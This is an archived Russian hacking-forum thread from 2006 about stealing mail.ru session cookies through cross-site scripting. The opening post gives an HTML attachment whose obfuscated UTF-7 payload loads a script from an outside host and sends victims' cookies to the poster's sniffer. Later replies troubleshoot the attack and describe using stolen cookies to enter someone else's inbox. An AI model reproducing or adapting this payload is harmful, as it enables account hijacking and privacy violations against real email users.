Форум АНТИЧАТ
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   XSS на mail.ru (https://forum.antichat.xyz/showthread.php?t=24962)

Actu@l SpY 06.10.2006 15:00
XSS на mail.ru
 
Взлом Майл.ру
жертва должна будет скачать и открыть прикреплённый файл в хтмл формате

<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
<TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')">
</html>

куки придут на мой сниффер
вы можете воспользоваться ими по адресу:www.devarsiv.org/alex/alex.php

сейчас сделаю видео !

удачи!

SladerNon 06.10.2006 15:30
Actu@l SpY

Круто нафиг! :). Давай видео !!! )

bul.666 06.10.2006 15:36
Отлично!

Koller 06.10.2006 15:45
Сделав как описанно выше на сниффер пришло следующее:

"REFERER=http://win.mail.ru/cgi-bin/readmsg/1.html?id=11601349480000001767;0;1&mode=attachment &channel=¬ype"

Что-то не так делаю или что?
Ведь сессии самой то нет...

-Concord- 07.10.2006 01:16
Если сработает то будет круто.... а сниф может не сработать? иногда бывает что приходит пустые логи..

Koller 07.10.2006 01:24
Если я ничего не путаю, то я вижу следующее:
Примеры, которые привел Actu@l SpY не будут работать хотя бы по той причине, что пути такого как "http://win.mail.ru/session/......" нет уже...в данный момент "http://win.mail.ru/cgi-bin/..."
Сессию сниффер никак не может утянуть...
По крайней мере у меня не получилось, хотел делал точно все так, как описано выше...
Может подскажите в чем моя ошибка?

Actu@l SpY 07.10.2006 01:44
до того момента как я выложил багу на форуме всё работало,
буквально через 30 минут,эту багу прикрыли ,остался только вариант через мой сниффер и то по непонятным причинам попасть в инбокс через оперу по свежим кукам стало проблематично

Actu@l SpY 07.10.2006 01:55
nc.STRIEM подтвердит, что сегодня он побывал у меня-же в инбоксе,приведённым мной вариантом,,а через пол чеса облом, багу видимо прикрыли,но всё-же подменив куки в опере мы попадем в инбокс,на то время пока жертва будет в он-лине

SladerNon 07.10.2006 12:37
Actu@l SpY

Ну это для нас давно не секрет, что люди с mail.ru тоже тут тусуються, потому как бы стараемся что-то свеженькое и горячее переносить в закрытую зону.

P.S. В этот раз меня терзали смутные сомнения, убрать ли тему выше или оставить тут. Оставил ). Результат на лицо :)

Bayazid 07.10.2006 12:39
Круто чувак.Ждем видео.


Время: 00:37
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице